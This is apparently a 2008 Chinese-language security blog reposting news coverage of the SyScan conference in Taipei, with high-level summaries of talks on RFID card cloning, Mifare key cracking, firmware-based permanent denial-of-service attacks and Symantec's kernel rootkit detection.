SyScan今年舉辦第五屆,和本地資安業者阿碼科技共同合辦,這也是SyScan首次來到台灣。此次引進的講師陣容除了BlackHat、DefCon等國外知名資安會議定期講師,還包括HP、賽門鐵克的資安研究室成員。

例如全球首屈一指資安盛會BlackHat、DefCon的核心成員之一Adam Laurie此次特地來台擔任講師,探討RFID的安全議題。另外此次同樣以RFID安全為主題的Fyodor Yarochkin也長期擔任BlackHat會議講師,讓本地資安業者在國內就有和BlackHat同等的講師資源。

SyScan標榜會議特色在於探討具前瞻性的資安技術,其中RFID安全、手機、嵌入式系統的安全議題都是首日活動的重點。而Laurie正是近幾年來專注研究RFID安全的專家,他在現場就示範了如何入侵RFID系統,將身分識別卡、智慧卡(SmartPay)等資料複製盜用。

他指出,RFID現在有太多應用,例如動物的身分識別、旅館鑰匙、商品標籤等等,不過卻很少人注意到潛藏的安全性問題。「在沒有任何加密的情形下,裡面的資料很容易就被複製。」Laurie表示。而RFID漸漸被應用在如電子錢包、電子護照等等,讓安全議題顯得更加重要。

HP可信任系統研究室成員Richard Smith則在會中針對嵌入式系統安全發表新型攻擊Permananet Denial of Service(PDOS)手法,Smith也時常在BlackHat、DefCon等大型國際資安會議中擔任講師。

Smith從韌體安全(firmware)的角度來探討嵌入式裝置安全,他認為,目前主要業者的努力方向都在端點保護,而在這些裝置中,韌體常常是被忽略的一塊。

本地主辦單位阿碼科技表示,台灣資安社群反應比想像中熱烈,原本租借的場地不敷使用,還更換另一個較大的場地,共有超過300人報名。SyScan今天開始在台北共有兩天議程,明天還有國內知名資安部落格大砲開講部落客邱春樹針對惡意程式進行探討。

ITHome: 偵測系統核心木馬技術有新進展


http://www.ithome.com.tw/itadm/article.php?c=49838
文/王宏仁 (記者) 2008-07-17

核心木馬攻擊開始具有針對性,只有特定對象才會受害。賽門鐵克首席工程師來臺展示最新的木馬偵測程式,可以監控出未知驅動程式的隱藏木馬行為。



賽門鐵克資安研究室首席工程師Matthew Conover來臺展示偵測系統核心木馬(Kernel Rootkit)的新技術,將在新的防毒產品上運用這個偵測技術,讓防毒軟體可以發現過去難以偵測的「目標性(Target)木馬攻擊」。

Matthew Conover指出:「最近出現新的木馬攻擊手法,不只針對特定目標攻擊,還使用了難以發現的核心木馬感染技術,因而傳統的防毒偵測技術,很難完全發現這些隱藏在系統核心中的木馬程式。」

在木馬感染技術中,一般防毒軟體的系統執行權限,多半只能發現函式庫等級(Library Level)或應用程式等級(Application Level)的木馬,而一般防毒軟體最難預防的,正是隱藏成系統元件或驅動程式的核心木馬程式。他表示,通常只有在這些核心木馬程式發生了破壞系統的行為,否則防毒軟體很難偵測到。

Matthew Conover解釋最新出現的目標性木馬攻擊,他說:「只有遇到特定企業或機構的使用者,木馬程式才會啟動感染機制,例如顧客傳一份申請文件給銀行時,顧客打開文件不會中木馬,但是銀行行員打開文件才會啟動木馬,讓木馬潛伏期更長,風險也更大。」

過去偵測核心木馬的技術,是建立一個追蹤環境,觀察未知驅動程式的執行結果,但因為追蹤環境只是模擬使用者的一般系統環境,對需要特定條件才會啟動的目標性木馬,因為會誤判為正常的驅動程式而沒有效果。Matthew Conover所開發的偵測技術,則是建立一個監控未知驅動程式與系統溝通過程的Sandbox環境,可以在正常的使用環境中,觀察可疑程式與系統正常元件的資訊傳遞,進而發現異常的元件使用行為,例如可以發現不需要使用者輸入資料的驅動程式,卻呼叫了鍵盤指令,那這個程式就有可能是要偷取使用者輸入密碼的木馬程式。

目前賽門鐵克已經使用這個技術,來累積木馬程式的可疑行為特徵。Matthew Conover表示:「賽門鐵克會先在防毒程式中使用實驗室累積的行為特徵資料來偵測,下一階段才應用在防毒程式中,來監控未知的木馬程式。」文⊙王宏仁

網路資訊:RFID漏洞百出?


http://news.networkmagazine.com.tw/secruity/scrtnews/2008/07/07/895/
2008.07.7 陳宛綺/報導

資安大會SyScan今日於台北舉辦,邀請了國內外知名資安專家共同針對最新攻擊手法,特別是針對RFID與嵌入式系統,進行現場討論與Demo。

負責籌辦此次SyScan活動的阿碼科技執行長黃耀文表示,此次的會議分成2天進行;第一天主要邀集來自國外知名資安Forum專家,包括Adam Laurie、Matthew Conover、Richard Smith與Fyodor Yarochkin等,針對目前新式攻擊方式發表演說,第二天則主要以國內資安專家/駭客的演說為主。

對於目前使用越來越普遍的RFID,首次拜訪臺灣的Adam Laurie在此次的演講中,展現了多種利用RFID Reader即可輕鬆竊取RFID中Tag資料的方法。包括內含簡單ID/Data的「Dumb」卡,如門禁卡、動物晶片,甚至是智慧型卡片,如內含數位錢包的交通運輸卡,或是具有生物辨識的數位護照等,透過工具,其內含的資料都可以快速被複製。再加上這類RFID駭客工具的射頻範圍廣,因此只要這些駭客工具經過你身邊,就可以讀到卡片中的資料,或將卡片內的資料複製過去。

來自俄羅斯的Fyodor Yarochkin講師,則在此會議上公開的他最新研發的RFID駭客工具。Fyodor自己所寫的工具可以破解Mifare卡的key,而台北捷運所使用的即是Mifare卡。透過這些RFID駭客工具,駭客即可讀出智慧卡的資料,或是為卡片加值,或是再複製一張RFID卡;若是有照片的智慧卡,透過這些工具也可快速「製造」新使用者。

除了RFID議題之外,可攜式裝置的資安問題也受到關注。COSEINC的Petr Matousek則公開許多能夠攻陷Windows Embedded CE 6 核心,並隱藏 rootkit 的方法,以及如何偵測與監控的防禦工具介紹。HP的Richard Smith則介紹一種針對嵌入式系統設備的新型態攻擊手法:永久性DOS (Permanent Denial Of Service,PDOS);而利用一種名為Phlashing的攻擊手法即可以遠端完成PDOS攻擊。

SyScan明日在臺北還有一整天的會議,包括將公開嵌入式 script 攻擊手法,以及如何在WinCE上發現弱點,並如何有效隱藏 rootkit等技術。

作者 Wayne 為阿碼科技 CEO

繼續閱讀全文...

2008年5月20日

台灣網站遭受有史以來最大規模 SQL Injection 攻擊

無法查看此摘要。請 按這裡查看文章。
繼續閱讀全文...